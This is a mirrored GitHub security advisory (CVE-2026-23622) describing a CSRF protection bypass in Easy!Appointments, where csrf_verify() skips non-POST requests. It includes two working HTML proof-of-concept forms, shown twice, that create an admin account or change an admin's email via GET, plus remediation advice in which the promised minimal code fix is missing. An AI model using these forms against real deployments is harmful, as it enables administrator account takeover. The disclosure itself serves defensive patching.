GHSA-54V4-4685-VWRJ

Vulnerability from github – Published: 2026-01-15 20:11 – Updated: 2026-01-15 22:34
VLAI?
Summary
alextselegidis/easyappointments is Vulnerable to CSRF Protection Bypass
Details

Summary

application/core/EA_Security.php::csrf_verify() only enforces CSRF for POST requests and returns early for non-POST methods. Several application endpoints perform state-changing operations while accepting parameters from GET (or $_REQUEST), so an attacker can perform CSRF by forcing a victim's browser to issue a crafted GET request. Impact: creation of admin accounts, modification of admin email/password, and full admin account takeover

Details

in https://github.com/alextselegidis/easyappointments/blob/41c9b93a5a2c185a914f204412324d8980943fd5/application/core/EA_Security.php#L52

  • Repository / tested commit: alextselegidis/easyappointments — commit 41c9b93a5a2c185a914f204412324d8980943fd5.
  • Vulnerable file & function: application/core/EA_Security.php::csrf_verify() — around line 52. Link: .../application/core/EA_Security.php#L52.
  • Root cause: The function early-returns when the request is not POST:
// vulnerable snippet
if (strtoupper($_SERVER['REQUEST_METHOD']) !== 'POST') {
    return $this->csrf_set_cookie();
}

Because of this, non-POST requests (GET/PUT/DELETE/etc.) never reach token validation. When application controllers accept state-changing parameters via GET or $_REQUEST, these requests bypass CSRF checks entirely and the application executes the state change.

  • Examples of vulnerable endpoints (observed during testing):

  • index.php/admins/store — create admin (accepts fields via GET)

  • index.php/admins/update — modify admin (accepts fields via GET)

  • index.php/account/save — modify account/password (accepts fields via GET)

  • Why this is critical: An attacker can host a simple page that issues requests (e.g., <form method="GET" action="..."> or an auto-submitting form). If an authenticated admin visits that page, the attacker can create an admin account, change admin email, or change password—enabling account takeover and full compromise of the application instance.

PoC

I will attach video proof showing how I add an admin via CSRF. Below are reproducible PoC artifacts and steps to reproduce locally

https://github.com/user-attachments/assets/3fea1034-c479-43d9-9c40-86f8ba0b33c1

Browser PoC (HTML) Save one of the HTML files (example csrf_add_admin_account.html) on an attacker server and visit it with a browser where the admin is logged into Easy!Appointments:

<html>
<body>
<form method="GET" action="http://localhost:80/easyappointments/index.php/admins/store">
  <input type="hidden" name="admin[first_name]" value="admin_add_by_csrf">
  <input type="hidden" name="admin[last_name]" value="poc">
  <input type="hidden" name="admin[email]" value="poc@gmail.com">
  <input type="hidden" name="admin[mobile_number]" value="">
  <input type="hidden" name="admin[phone_number]" value="0923092">
  <input type="hidden" name="admin[address]" value="">
  <input type="hidden" name="admin[city]" value="">
  <input type="hidden" name="admin[state]" value="">
  <input type="hidden" name="admin[zip_code]" value="">
  <input type="hidden" name="admin[notes]" value="">
  <input type="hidden" name="admin[language]" value="english">
  <input type="hidden" name="admin[timezone]" value="UTC">
  <input type="hidden" name="admin[settings][username]" value="admincsrf1">
  <input type="hidden" name="admin[settings][notifications]" value="1">
  <input type="hidden" name="admin[settings][calendar_view]" value="table">
  <input type="hidden" name="admin[settings][password]" value="changeme">
  <input type="submit" value="Submit request">
</form>
</body>
</html>

another example for another endpoint

csrf_change_admin_email.html

<html>
<body>
<form method="GET" action="http://localhost:80/easyappointments/index.php/admins/update">
  <input type="hidden" name="admin[first_name]" value="test">
  <input type="hidden" name="admin[last_name]" value="cve">
  <input type="hidden" name="admin[email]" value="test1@cve.com">
  <input type="hidden" name="admin[mobile_number]" value="">
  <input type="hidden" name="admin[phone_number]" value="0101900">
  <input type="hidden" name="admin[address]" value="">
  <input type="hidden" name="admin[city]" value="">
  <input type="hidden" name="admin[state]" value="">
  <input type="hidden" name="admin[zip_code]" value="">
  <input type="hidden" name="admin[notes]" value="">
  <input type="hidden" name="admin[language]" value="english">
  <input type="hidden" name="admin[timezone]" value="UTC">
  <input type="hidden" name="admin[settings][username]" value="testn">
  <input type="hidden" name="admin[settings][notifications]" value="1">
  <input type="hidden" name="admin[settings][calendar_view]" value="default">
  <input type="hidden" name="admin[id]" value="1">
  <input type="submit" value="Submit request">
</form>
</body>
</html>

Suggested remediation (recommended)

Provide two practical remediation paths mmediate and long-term:

Immediate (urgent, low-effort): Enforce CSRF checks for all methods and do not skip validation for non-POST. Minimal core fix:

This closes the common bypass route while keeping read-only GET behavior intact.

Stricter immediate option (no-bypass): Require a valid CSRF token for all methods (including GET) unless the URI is explicitly whitelisted in csrf_exclude_uris. This prevents GET-based bypass even if controllers remain unchanged but may require updates to legitimate GET consumers.

Long-term (recommended, correct fix):

  1. Controller hardening: Update controllers so all state-changing actions accept only the proper HTTP method (POST/PUT/DELETE) .
  2. Require re-authentication or confirmation for critical operations (email/password changes).
  3. Set cookie flags: SameSite, Secure, and HttpOnly as appropriate.

Impact

  • Type: Cross-Site Request Forgery (CSRF) allowing account takeover / privilege escalation.
  • Who is impacted: Any deployment of Easy!Appointments using the vulnerable code where administrative or sensitive endpoints accept GET or use $_REQUEST (what i found is almost every endpoint work with GET and POST). Logged-in administrator users are at greatest risk.
  • Consequences: An attacker can create administrative accounts, change administrator emails/passwords (leading to password reset abuse), and fully compromise application instances and data.
Severity ?
7.4 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "alextselegidis/easyappointments"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.5.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23622"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-15T20:11:23Z",
    "nvd_published_at": "2026-01-15T20:16:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`application/core/EA_Security.php::csrf_verify()` only enforces CSRF for POST requests and returns early for non-POST methods. Several application endpoints perform state-changing operations while accepting parameters from GET (or $_REQUEST), so an attacker can perform CSRF by forcing a victim\u0027s browser to issue a crafted GET request. Impact: creation of admin accounts, modification of admin email/password, and full admin account takeover\n\n### Details\n\nin https://github.com/alextselegidis/easyappointments/blob/41c9b93a5a2c185a914f204412324d8980943fd5/application/core/EA_Security.php#L52\n\n* **Repository / tested commit:** `alextselegidis/easyappointments` \u2014 commit `41c9b93a5a2c185a914f204412324d8980943fd5`.\n* **Vulnerable file \u0026 function:** `application/core/EA_Security.php::csrf_verify()` \u2014 around line 52. Link: `.../application/core/EA_Security.php#L52`.\n* **Root cause:** The function early-returns when the request is not `POST`:\n\n```php\n// vulnerable snippet\nif (strtoupper($_SERVER[\u0027REQUEST_METHOD\u0027]) !== \u0027POST\u0027) {\n    return $this-\u003ecsrf_set_cookie();\n}\n```\n\nBecause of this, non-POST requests (GET/PUT/DELETE/etc.) never reach token validation. When application controllers accept state-changing parameters via `GET` or `$_REQUEST`, these requests bypass CSRF checks entirely and the application executes the state change.\n\n* **Examples of vulnerable endpoints (observed during testing):**\n\n  * `index.php/admins/store` \u2014 create admin (accepts fields via GET)\n  * `index.php/admins/update` \u2014 modify admin (accepts fields via GET)\n  * `index.php/account/save` \u2014 modify account/password (accepts fields via GET)\n\n* **Why this is critical:** An attacker can host a simple page that issues requests (e.g., `\u003cform method=\"GET\" action=\"...\"\u003e` or an auto-submitting form). If an authenticated admin visits that page, the attacker can create an admin account, change admin email, or change password\u2014enabling account takeover and full compromise of the application instance.\n\n\n### PoC\nI will attach video proof showing how I add an admin via CSRF. Below are reproducible PoC artifacts and steps to reproduce locally \n\nhttps://github.com/user-attachments/assets/3fea1034-c479-43d9-9c40-86f8ba0b33c1\n\n**Browser PoC (HTML)**\nSave one of the HTML files (example `csrf_add_admin_account.html`) on an attacker server and visit it with a browser where the admin is logged into Easy!Appointments:\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cform method=\"GET\" action=\"http://localhost:80/easyappointments/index.php/admins/store\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[first_name]\" value=\"admin_add_by_csrf\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[last_name]\" value=\"poc\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[email]\" value=\"poc@gmail.com\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[mobile_number]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[phone_number]\" value=\"0923092\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[address]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[city]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[state]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[zip_code]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[notes]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[language]\" value=\"english\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[timezone]\" value=\"UTC\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][username]\" value=\"admincsrf1\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][notifications]\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][calendar_view]\" value=\"table\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][password]\" value=\"changeme\"\u003e\n  \u003cinput type=\"submit\" value=\"Submit request\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nanother example for another endpoint\n\n`csrf_change_admin_email.html`\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cform method=\"GET\" action=\"http://localhost:80/easyappointments/index.php/admins/update\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[first_name]\" value=\"test\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[last_name]\" value=\"cve\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[email]\" value=\"test1@cve.com\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[mobile_number]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[phone_number]\" value=\"0101900\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[address]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[city]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[state]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[zip_code]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[notes]\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[language]\" value=\"english\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[timezone]\" value=\"UTC\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][username]\" value=\"testn\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][notifications]\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[settings][calendar_view]\" value=\"default\"\u003e\n  \u003cinput type=\"hidden\" name=\"admin[id]\" value=\"1\"\u003e\n  \u003cinput type=\"submit\" value=\"Submit request\"\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Suggested remediation (recommended)\n\nProvide two practical remediation paths mmediate and long-term:\n\n**Immediate (urgent, low-effort):** Enforce CSRF checks for all  methods  and do not skip validation for non-POST. Minimal core fix:\n\nThis closes the common bypass route while keeping read-only GET behavior intact.\n\n**Stricter immediate option (no-bypass):** Require a valid CSRF token for **all** methods (including GET) unless the URI is explicitly whitelisted in `csrf_exclude_uris`. This prevents GET-based bypass even if controllers remain unchanged but may require updates to legitimate GET consumers.\n\n**Long-term (recommended, correct fix):**\n\n1. **Controller hardening:** Update controllers so all state-changing actions accept only the proper HTTP method (POST/PUT/DELETE) .\n2. **Require re-authentication or confirmation** for critical operations (email/password changes).\n3. **Set cookie flags**: `SameSite`, `Secure`, and `HttpOnly` as appropriate.\n\n\n### Impact\n\n* **Type:** Cross-Site Request Forgery (CSRF) allowing account takeover / privilege escalation.\n* **Who is impacted:** Any deployment of Easy!Appointments using the vulnerable code where administrative or sensitive endpoints accept GET or use `$_REQUEST` (what i found is almost every endpoint work with GET and POST). Logged-in administrator users are at greatest risk.\n* **Consequences:** An attacker can create administrative accounts, change administrator emails/passwords (leading to password reset abuse), and fully compromise application instances and data.",
  "id": "GHSA-54v4-4685-vwrj",
  "modified": "2026-01-15T22:34:15Z",
  "published": "2026-01-15T20:11:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/alextselegidis/easyappointments/security/advisories/GHSA-54v4-4685-vwrj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23622"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/alextselegidis/easyappointments"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alextselegidis/easyappointments/blob/41c9b93a5a2c185a914f204412324d8980943fd5/application/core/EA_Security.php#L52"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "alextselegidis/easyappointments is Vulnerable to CSRF Protection Bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.